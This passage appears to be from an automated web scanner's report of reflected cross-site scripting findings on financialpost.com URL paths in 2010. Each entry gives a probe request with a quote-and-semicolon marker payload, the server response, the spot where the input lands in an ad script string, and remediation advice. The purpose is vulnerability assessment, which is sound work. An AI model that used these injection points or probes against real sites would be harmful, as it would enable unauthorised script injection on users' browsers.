GET /entrepreneur/Social+media+gives+medium+life/3931982/afc98'%3ba15a08852bc HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44342
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f775e'%3b6b7ab346bbb was submitted in the REST URL parameter 1. This input was echoed as f775e';6b7ab346bbb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneurf775e'%3b6b7ab346bbb/Strategy+comes+easy/3931965/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81970
Expires: Sun, 19 Dec 2010 03:14:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurf775e';6b7ab346bbb/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurf775e';6b7ab346bbb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=45520954?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6435'%3b4f2bbbc1920 was submitted in the REST URL parameter 3. This input was echoed as b6435';4f2bbbc1920 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Strategy+comes+easy/3931965b6435'%3b4f2bbbc1920/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54006
Expires: Sun, 19 Dec 2010 03:14:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/strategy-comes-easy/3931965b6435';4f2bbbc1920/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=strategy-comes-easy;kw=3931965b6435';4f2bbbc1920;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=3973656 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 645f3'%3b095502b1fd7 was submitted in the REST URL parameter 4. This input was echoed as 645f3';095502b1fd7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Strategy+comes+easy/3931965/645f3'%3b095502b1fd7 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44013
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6640b'%3b10be691c8d7 was submitted in the REST URL parameter 1. This input was echoed as 6640b';10be691c8d7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur6640b'%3b10be691c8d7/Virtual+training/3967328/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83218
Expires: Sun, 19 Dec 2010 03:14:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:14 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur6640b';10be691c8d7/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur6640b';10be691c8d7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50079065?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb40f'%3b9d8ba420d75 was submitted in the REST URL parameter 3. This input was echoed as eb40f';9d8ba420d75 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Virtual+training/3967328eb40f'%3b9d8ba420d75/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 53895
Expires: Sun, 19 Dec 2010 03:14:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/virtual-training/3967328eb40f';9d8ba420d75/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=virtual-training;kw=3967328eb40f';9d8ba420d75;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68303724?" ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7504a'%3b07f3b9742b1 was submitted in the REST URL parameter 4. This input was echoed as 7504a';07f3b9742b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Virtual+training/3967328/7504a'%3b07f3b9742b1 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44723
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74d93'%3be0889b50b05 was submitted in the REST URL parameter 1. This input was echoed as 74d93';e0889b50b05 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur74d93'%3be0889b50b05/advice/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44241
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed228'%3b2c8aa648e62 was submitted in the REST URL parameter 2. This input was echoed as ed228';2c8aa648e62 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/adviceed228'%3b2c8aa648e62/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43385
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83f2b'%3b12bcecac1dd was submitted in the REST URL parameter 1. This input was echoed as 83f2b';12bcecac1dd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur83f2b'%3b12bcecac1dd/killer+apps/3967312/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75646
Expires: Sun, 19 Dec 2010 03:14:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur83f2b';12bcecac1dd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur83f2b';12bcecac1dd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30614803?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9123'%3bb2fb6e2f239 was submitted in the REST URL parameter 3. This input was echoed as f9123';b2fb6e2f239 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/killer+apps/3967312f9123'%3bb2fb6e2f239/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 53710
Expires: Sun, 19 Dec 2010 03:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/killer-apps/3967312f9123';b2fb6e2f239/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=killer-apps;kw=3967312f9123';b2fb6e2f239;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34256389?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1b1a'%3b6b59f0dfd4e was submitted in the REST URL parameter 4. This input was echoed as d1b1a';6b59f0dfd4e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/killer+apps/3967312/d1b1a'%3b6b59f0dfd4e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43793
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 774a7'%3b09a396780ea was submitted in the REST URL parameter 1. This input was echoed as 774a7';09a396780ea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive774a7'%3b09a396780ea/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43161
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d37d2'%3b1feea254f5a was submitted in the REST URL parameter 1. This input was echoed as d37d2';1feea254f5a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executived37d2'%3b1feea254f5a/Departures+2010/3987965/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84441
Expires: Sun, 19 Dec 2010 03:11:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:50 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executived37d2';1feea254f5a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executived37d2';1feea254f5a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69285676?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14022'%3bbd82e3b5b53 was submitted in the REST URL parameter 3. This input was echoed as 14022';bd82e3b5b53 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Departures+2010/398796514022'%3bbd82e3b5b53/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69246
Expires: Sun, 19 Dec 2010 03:12:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:03 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/departures-2010/398796514022';bd82e3b5b53/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=departures-2010;kw=398796514022';bd82e3b5b53;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=92756471?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55e80'%3b7249d7b80f9 was submitted in the REST URL parameter 4. This input was echoed as 55e80';7249d7b80f9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Departures+2010/3987965/55e80'%3b7249d7b80f9 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43809
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86b9c'%3bbb1481860ca was submitted in the REST URL parameter 1. This input was echoed as 86b9c';bb1481860ca in the application's response.
